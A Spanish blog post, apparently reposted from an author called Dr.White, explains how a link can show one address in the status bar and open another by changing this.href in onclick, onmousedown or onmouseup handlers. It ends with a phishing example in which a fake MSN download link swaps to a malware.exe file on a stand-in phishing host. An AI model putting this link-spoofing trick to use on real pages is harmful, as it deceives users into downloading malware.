Confiar en la barra de estado?

Escrito por admin el . Posteado en Informatica

El Javascript puede ser un arma increíble y les quiero demostrar como podríamos usar un ataque usando this.href y onmouseup…

Bueno empezemos por recordar como ponemos los links en html y los eventos que tenemos… en principio un simple link de afiliación a seguridadblanca…

<a href=”http://www.seguridadblanca.org”>SeguridadBlanca</a>

listo y como html debe quedar algo como:

SeguridadBlanca

pero… por que siempre hay un pero cuando tu das un click hay dos eventos principales:

Apretar Boton del Mouse

Soltar Boton del Mouse

No se me pongan con que ya se html… yo se que saben pero… ahora va a venir la parte interesante…

asi como este tutorial hay varios sinceramente esta tecnica me di cuenta en un foro… vi que daba click pero siempre me cambiaba la url cuando era un link y busqué la respuesta y llegué a un tutorial pero este que estoy haciendo usa una técnica que es un poco mas difícil de detectar… de esto se darán cuenta durante el tutorial…

cuando teniamos el anterior link el de seguridadblanca si ustedes ponen el mouse sobre el link en la barra de estado del navegador saldrá www.seguridadblanca.org y cuando dan click los lleva a www.seguridadblanca.org pero… con algunas de las funciones que tiene el mismo a href combinado con un poco de javascript podríamos hacer que refireccione a otro lugar… observen:

<a href=”http://www.google.com.pe/” onclick=”this.href=’http://www.seguridadblanca.org'”>google.com</a>

nuestro lindo codigo hace que todo se vea como si al dar click fuesemos a google.com.pe pero nah con la ayudita de nuestro javascript tan querido usando el this.href hemos logrado que al dar click (onclick) nos lleve a seguridadblanca.org porfavor… veamoslo en accion.

google.com

Ahora se dan cuenta lo que pasó?… lo podemos hacer mas peligroso aun… en la mayoría de los tutoriales usan este ejemplo pero en vez de onclick usan onmousedown sin embargo asi fue como detecté yo el error en el foro que les contaba anterior mente… porfavor… vamos a hacer lo siguiente…

<a href=”http://www.google.com/” onmousedown=”this.href=’http://www.website.sxi-web.es'”>google.com</a>

usando el anterior ejemplo quiero que vean la situacion real…

google.com

si le dan click los llevará a SeguridadBlanca pero… quiero que presten atención a algo… apreten el mouse sobre el link pero no suelten…y luego arrastren el link hacia cualquier lado donde no se pueda pegar es decir unos centimetros a la derecha o izquierda y luego suelten… ahora pongan su mouse sobre el link… :O si señores… se ve el link de seguridadblanca.org ha fallado nuestro intento de engañar al usuario… por que? porque el evento onmousedown() fue ejecutado… al nosotros dar click haya sido sin soltarlo se ejecuto el momento…

pero… cambiando la palabra down por la palabra UP podríamos cambiar todo el asunto…

<a href=”http://www.google.com/” onmouseup=”this.href=’http://www.website.sxi-web.es'”>google.com</a>

listo ese es el codigo ahora veamoslo en acción quisiera que hagan lo mismo pero con el link de abajo…

google.com

no paso nada… no cambio el statusbar sigue diciendo que el link nos llevará a google.com eso es por que el evento se ejecuta una vez que hayamos soltado el dedo el mouse cuando ya no hay marcha atras…

algunos de ustedes dirán… y esto de que me sirve? pues… sirve de mucho mas que nada como somos de seguridad viendolo por el tema del BlacHat que sinceramente es lo mas divertido… imaginemos un acceso a una web muy visitada de messenger, faceboo y actualidad en general… y pones esto…

<a href=” http://g.live.com/1rewlive3/en/wlsetup-web.exe” onmouseup=”this.href=’http://msn.phishing.org/malware.exe'”>Descarga la Nueca Versión de MSN 100.0.0.0.2 xD</a>

Cuantas victimas crees que abrían… eso sin contar que no hemos tocado htaccess para hacer un poco mas creibles las cosas…

Espero les haya gustado

Fuente: Dr.White

Share

Etiquetas:,

"Trackback" Enlace desde tu web.

Deja un comentario

SXInformatica
C/Soria 5 25200 Cervera
973 534 445
info@sxinformatica.net

PCmode
www.pcmode.net
635 824 172
ventas@pcmode.net
SEO Powered by Platinum SEO from Techblissonline